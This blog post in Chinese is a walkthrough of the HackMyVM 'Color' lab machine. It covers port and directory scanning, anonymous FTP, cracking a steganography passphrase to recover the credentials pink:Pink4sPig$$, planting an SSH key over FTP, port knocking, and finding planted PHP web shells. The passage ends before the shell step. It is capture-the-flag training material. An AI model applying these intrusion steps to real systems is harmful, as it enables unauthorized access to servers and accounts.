{"id":643,"date":"2024-04-27T15:18:28","date_gmt":"2024-04-27T07:18:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=643"},"modified":"2024-04-27T15:18:28","modified_gmt":"2024-04-27T07:18:28","slug":"hmv-_-color","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/643\/04\/27\/2024\/","title":{"rendered":"hmv[-_-]color"},"content":{"rendered":"

Colors<\/h1>\n

\"image-20240427122541313\"<\/div><\/p>\n
Hey hacker, I've heard a lot about you and I've been told you're good. \n\nThe FBI has hacked into my apache server and shut down my website. I need you to sneak in and retrieve the "root.txt" file. I left my credentials somewhere but I can't remember where.\n\nI will pay you well if you succeed, good luck hacker.<\/code><\/pre>\n
\"image-20240427130947612\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ rustscan -a 192.168.0.162 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.162:21\nOpen 192.168.0.162:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 01:10 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nInitiating Ping Scan at 01:10\nScanning 192.168.0.162 [2 ports]\nCompleted Ping Scan at 01:10, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 01:10\nCompleted Parallel DNS resolution of 1 host. at 01:10, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 01:10\nScanning color (192.168.0.162) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.162\nDiscovered open port 21\/tcp on 192.168.0.162\nCompleted Connect Scan at 01:10, 0.00s elapsed (2 total ports)\nInitiating Service scan at 01:10\nScanning 2 services on color (192.168.0.162)\nCompleted Service scan at 01:10, 6.06s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.162.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nNSE: [ftp-bounce 192.168.0.162:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 01:10, 0.81s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNmap scan report for color (192.168.0.162)\nHost is up, received syn-ack (0.00048s latency).\nScanned at 2024-04-27 01:10:13 EDT for 7s\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 1127     1127            0 Jan 27  2023 first\n| -rw-r--r--    1 1039     1039            0 Jan 27  2023 second\n| -rw-r--r--    1 0        0          290187 Feb 11  2023 secret.jpg\n|_-rw-r--r--    1 1081     1081            0 Jan 27  2023 third\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 2\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-title: Document\nService Info: OS: Unix\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.02s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.55 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.162\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.162\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php,zip,bak,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 295]\n\/manual               (Status: 301) [Size: 315] [--> http:\/\/192.168.0.162\/manual\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240427131233449\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ curl http:\/\/192.168.0.162\/\n<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta charset="UTF-8">\n    <meta http-equiv="X-UA-Compatible" content="IE=edge">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n    <title>Document<\/title>\n<\/head>\n<body>\n    <img src=".\/seized.png" alt="">\n<\/body>\n<\/html><\/code><\/pre>\n
ftp<\/h3>\n
\u533f\u540d\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||12661|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        0            4096 Feb 20  2023 .\ndrwxr-xr-x    2 0        0            4096 Feb 20  2023 ..\n-rw-r--r--    1 1127     1127            0 Jan 27  2023 first\n-rw-r--r--    1 1039     1039            0 Jan 27  2023 second\n-rw-r--r--    1 0        0          290187 Feb 11  2023 secret.jpg\n-rw-r--r--    1 1081     1081            0 Jan 27  2023 third\n226 Directory send OK.\nftp> get first\nlocal: first remote: first\n229 Entering Extended Passive Mode (|||60245|)\n150 Opening BINARY mode data connection for first (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nftp> wget *\n?Invalid command.\nftp> mget *\nmget first [anpqy?]? \n229 Entering Extended Passive Mode (|||27429|)\n150 Opening BINARY mode data connection for first (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nmget second [anpqy?]? \n229 Entering Extended Passive Mode (|||27177|)\n150 Opening BINARY mode data connection for second (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nmget secret.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||51770|)\n150 Opening BINARY mode data connection for secret.jpg (290187 bytes).\n100% |***********************************************************************************************************|   283 KiB    8.74 MiB\/s    00:00 ETA\n226 Transfer complete.\n290187 bytes received in 00:00 (8.62 MiB\/s)\nmget third [anpqy?]? \n229 Entering Extended Passive Mode (|||7815|)\n150 Opening BINARY mode data connection for third (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ls\nfirst  second  secret.jpg  third\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat first                 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat second \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat third \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ exiftool secret.jpg \nExifTool Version Number         : 12.23\nFile Name                       : secret.jpg\nDirectory                       : .\nFile Size                       : 283 KiB\nFile Modification Date\/Time     : 2023:02:11 12:35:33-05:00\nFile Access Date\/Time           : 2024:04:27 01:15:03-04:00\nFile Inode Change Date\/Time     : 2024:04:27 01:15:03-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    : 1\nY Resolution                    : 1\nImage Width                     : 735\nImage Height                    : 588\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 735x588\nMegapixels                      : 0.432\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ls -la\ntotal 292\ndrwxr-xr-x  2 kali kali   4096 Apr 27 01:15 .\ndrwxr-xr-x 75 kali kali   4096 Apr 27 01:08 ..\n-rw-r--r--  1 kali kali      0 Jan 27  2023 first\n-rw-r--r--  1 kali kali      0 Jan 27  2023 second\n-rw-r--r--  1 kali kali 290187 Feb 11  2023 secret.jpg\n-rw-r--r--  1 kali kali      0 Jan 27  2023 third<\/code><\/pre>\n
\u4e09\u4e2a\u6587\u4ef6\u5565\u5185\u5bb9\u90fd\u6ca1\u6709\uff0c\u770b\u6765\u662f\u4e00\u79cd\u63d0\u793a\uff0c\u4e14\u6b63\u597d\u4e09\u4e2a1127,1039,1081<\/code><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt secret.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: "Nevermind"        \n[i] Original filename: "more_secret.txt".\n[i] Extracting to "secret.jpg.out"<\/code><\/pre>\n
\u54e6\u543c\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240427134442713\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat secret.jpg.out \n<-MnkFEo!SARTV#+D,Y4D'3_7G9D0LFWbmBCht5'AKYi.Eb-A(Bld^%E,TH.FCeu*@X0)<BOr<.BPD?sF!,R<@<<W;Dfm15Bk2*\/F<G+4+EV:*DBND6+EV:.+E).\/F!,aHFWb4\/A0>E$\/g+)2+EV:;Dg*=BAnE0-BOr;qDg-#3DImlA+B)]_C`m\/1@<iu-Ec5e;FD,5.F(&Zl+D>2(@W-9>+@BRZ@q[!,BOr<.Ea`Ki+EqO;A9\/l-DBO4CF`JUG@;0P!\/g*T-E,9H5AM,)nEb\/Zr\/g*PrF(9-3ATBC1E+s3*3`'O.CG^*\/BkJ\\:<\/code><\/pre>\n
\u3002\u3002\u3002\u3002\u3002\u52a0\u89e3\u5bc6\uff1f<\/p>\n
\"image-20240427132504585\"<\/div><\/p>\n
Twenty years from now you will be more disappointed by the things that you didn't do than by the ones you did do. So throw off the bowlines. Sail away from the safe harbor. Catch the trade winds in your sails. Explore. Dream. Discover.\npink:Pink4sPig$$<\/code><\/pre>\n
\u989d\uff0c\u5c1d\u8bd5ssh\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5ftp\uff0c\u6210\u529f\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): pink\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||48922|)\n150 Here comes the directory listing.\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\ndrwx------    2 1127     1127         4096 Feb 11  2023 green\ndrwx------    3 1000     1000         4096 Feb 11  2023 pink\ndrwx------    2 1081     1081         4096 Feb 20  2023 purple\ndrwx------    2 1039     1039         4096 Feb 11  2023 red\n226 Directory send OK.\nftp> cd green\n550 Failed to change directory.\nftp> ls -la\n229 Entering Extended Passive Mode (|||56995|)\n150 Here comes the directory listing.\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\ndrwx------    2 1127     1127         4096 Feb 11  2023 green\ndrwx------    3 1000     1000         4096 Feb 11  2023 pink\ndrwx------    2 1081     1081         4096 Feb 20  2023 purple\ndrwx------    2 1039     1039         4096 Feb 11  2023 red\n226 Directory send OK.\nftp> cd pink\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||52190|)\n150 Here comes the directory listing.\ndrwx------    3 1000     1000         4096 Feb 11  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\nlrwxrwxrwx    1 1000     1000            9 Jan 27  2023 .bash_history -> \/dev\/null\n-rwx------    1 1000     1000          220 Jan 27  2023 .bash_logout\n-rwx------    1 1000     1000         3526 Jan 27  2023 .bashrc\n-rwx------    1 1000     1000          807 Jan 27  2023 .profile\ndrwx------    2 1000     1000         4096 Feb 11  2023 .ssh\n-rwx------    1 1000     1000         3705 Feb 11  2023 .viminfo\n-rw-r--r--    1 1000     1000           23 Feb 11  2023 note.txt\n226 Directory send OK.\nftp> get note.txt\nlocal: note.txt remote: note.txt\n229 Entering Extended Passive Mode (|||51693|)\n150 Opening BINARY mode data connection for note.txt (23 bytes).\n100% |***********************************************************************************************************|    23        0.83 KiB\/s    00:00 ETA\n226 Transfer complete.\n23 bytes received in 00:00 (0.81 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
\u4e0a\u4f20\u516c\u94a5\u8fdb\u884c\u8fde\u63a5<\/h3>\n
\u770b\u4e0a\u53bb\u8fdb\u5165\u4e86\u4e00\u4e2a\u5f88\u795e\u5947\u7684\u76ee\u5f55\uff0c\u6709\u70b9\u50cf\u7528\u6237\u76ee\u5f55\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u516c\u94a5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat note.txt      \nnothing to see here...\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/color\/color        \nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/color\/color\nYour public key has been saved in \/home\/kali\/temp\/color\/color.pub\nThe key fingerprint is:\nSHA256:yhuQMJNyxDYT7XLiekwiUPWwyy7w4EZ4Qzbb1xd9EeU kali@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n| .o+o         oo.|\n| .*..+     .   o |\n|.oX+. .   . . . E|\n|o=oOoo .   . .   |\n|=o++* . S .      |\n|==oo + . .       |\n|.Bo . +          |\n|o o.   o         |\n| .    .          |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ mv color.pub authorized_keys\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): pink\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> cd pink\n250 Directory successfully changed.\nftp> lls -la\n?Invalid command.\nftp> ls -la\n229 Entering Extended Passive Mode (|||16316|)\n150 Here comes the directory listing.\ndrwx------    3 1000     1000         4096 Feb 11  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\nlrwxrwxrwx    1 1000     1000            9 Jan 27  2023 .bash_history -> \/dev\/null\n-rwx------    1 1000     1000          220 Jan 27  2023 .bash_logout\n-rwx------    1 1000     1000         3526 Jan 27  2023 .bashrc\n-rwx------    1 1000     1000          807 Jan 27  2023 .profile\ndrwx------    2 1000     1000         4096 Feb 11  2023 .ssh\n-rwx------    1 1000     1000         3705 Feb 11  2023 .viminfo\n-rw-r--r--    1 1000     1000           23 Feb 11  2023 note.txt\n226 Directory send OK.\nftp> cd .ssh\n250 Directory successfully changed.\nftp> put authorized_keys \nlocal: authorized_keys remote: authorized_keys\n229 Entering Extended Passive Mode (|||40469|)\n150 Ok to send data.\n100% |***********************************************************************************************************|   563       13.09 MiB\/s    00:00 ETA\n226 Transfer complete.\n563 bytes sent in 00:00 (500.73 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
\u7136\u540e\u8fde\u63a5\u4e00\u4e0b\u8fd9\u4e2a\u7528\u6237\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ chmod 600 color \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh pink@192.168.0.162 -i color                 \nssh: connect to host 192.168.0.162 port 22: Connection refused<\/code><\/pre>\n
\u989d\uff0c\u5fd8\u4e86\u6ca1\u6709\u5f0022\u7aef\u53e3\u4e86\u3002\u3002\u3002\u5bc4\uff0c\u8054\u60f3\u5230\u4e0a\u9762\u7684\u4e09\u4e2a\u7aef\u53e3\uff0c\u8fdb\u884cknock\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ knock 192.168.0.162 1127 1039 1081 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ nmap 192.168.0.162                            \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 01:48 EDT\nNmap scan report for color (192.168.0.162)\nHost is up (0.00021s latency).\nNot shown: 997 closed tcp ports (conn-refused)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\n\nNmap done: 1 IP address (1 host up) scanned in 0.09 seconds<\/code><\/pre>\n
\u725b\u86d9\uff01\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh pink@192.168.0.162 -i color   \nssh: connect to host 192.168.0.162 port 22: Connection refused<\/code><\/pre>\n
\u5636\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ rustscan -a 192.168.0.162 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.162:21\nOpen 192.168.0.162:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")<\/code><\/pre>\n
\u4e3a\u5565\u6ca1\u5f00\u653e\u554a\u3002\u3002\u3002\u91cd\u65b0\u6765\u4e00\u6b21\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ knock 192.168.0.162 1127 1039 1081\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ sudo nmap 192.168.0.162             \n[sudo] password for kali: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 02:06 EDT\nNmap scan report for color (192.168.0.162)\nHost is up (0.00040s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 08:00:27:B0:F8:63 (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.59 seconds<\/code><\/pre>\n
\"image-20240427140705619\"<\/div><\/p>\n
\u6210\u529f\uff01\uff01\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u5207\u6362\u81f3html<\/h3>\n
pink@color:~$ cat .viminfo \n# This viminfo file was generated by Vim 8.2.\n# You may edit it if you're careful!\n\n# Viminfo version\n|1,4\n\n# Value of 'encoding' when this file was written\n*encoding=utf-8\n\n# hlsearch on (H) or off (h):\n~h\n# Command Line History (newest to oldest):\n:x\n|2,0,1676139493,,"x"\n:q\n|2,0,1675200748,,"q"\n:q!\n|2,0,1675181824,,"q!"\n\n# Search String History (newest to oldest):\n\n# Expression History (newest to oldest):\n\n# Input Line History (newest to oldest):\n\n# Debug Line History (newest to oldest):\n\n# Registers:\n""-     CHAR    0\n        #\n|3,1,36,0,1,0,1675181817,"#"\n\n# File marks:\n'0  1  28  \/var\/www\/html\/sh.php\n|4,48,1,28,1676139493,"\/var\/www\/html\/sh.php"\n'1  1  28  \/var\/www\/html\/a.php\n|4,49,1,28,1675200767,"\/var\/www\/html\/a.php"\n'2  1  0  \/var\/www\/html\/a.php\n|4,50,1,0,1675200748,"\/var\/www\/html\/a.php"\n'3  123  0  \/etc\/vsftpd.conf\n|4,51,123,0,1675181824,"\/etc\/vsftpd.conf"\n'4  1  0  \/etc\/ftpusers\n|4,52,1,0,1675181738,"\/etc\/ftpusers"\n\n# Jumplist (newest first):\n-'  1  28  \/var\/www\/html\/sh.php\n|4,39,1,28,1676139493,"\/var\/www\/html\/sh.php"\n-'  1  28  \/var\/www\/html\/a.php\n|4,39,1,28,1675200767,"\/var\/www\/html\/a.php"\n-'  1  28  \/var\/www\/html\/a.php\n|4,39,1,28,1675200767,"\/var\/www\/html\/a.php"\n-'  1  0  \/var\/www\/html\/a.php\n|4,39,1,0,1675200748,"\/var\/www\/html\/a.php"\n-'  1  0  \/var\/www\/html\/a.php\n|4,39,1,0,1675200748,"\/var\/www\/html\/a.php"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,"\/etc\/vsftpd.conf"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n-'  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,"\/etc\/ftpusers"\n\n# History of marks within files (newest to oldest):\n\n> \/var\/www\/html\/sh.php\n        *       1676139492      0\n        "       1       28\n        ^       1       29\n        .       1       28\n        +       1       28\n\n> \/var\/www\/html\/a.php\n        *       1675200766      0\n        "       1       28\n        ^       1       29\n        .       1       28\n        +       1       28\n\n> \/etc\/vsftpd.conf\n        *       1675181822      0\n        "       123     0\n        .       123     0\n        +       123     0\n\n> \/etc\/ftpusers\n        *       1675181733      0\n        "       1       0<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u5947\u602a\u7684\u6587\u4ef6\u5728\/var\/www\/html<\/code>\u4e0b\u8fdb\u884c\u4e86\u521b\u5efa\uff0c\u5c1d\u8bd5\u83b7\u53d6\u4e00\u4e0bshell\uff1a<\/p>\n
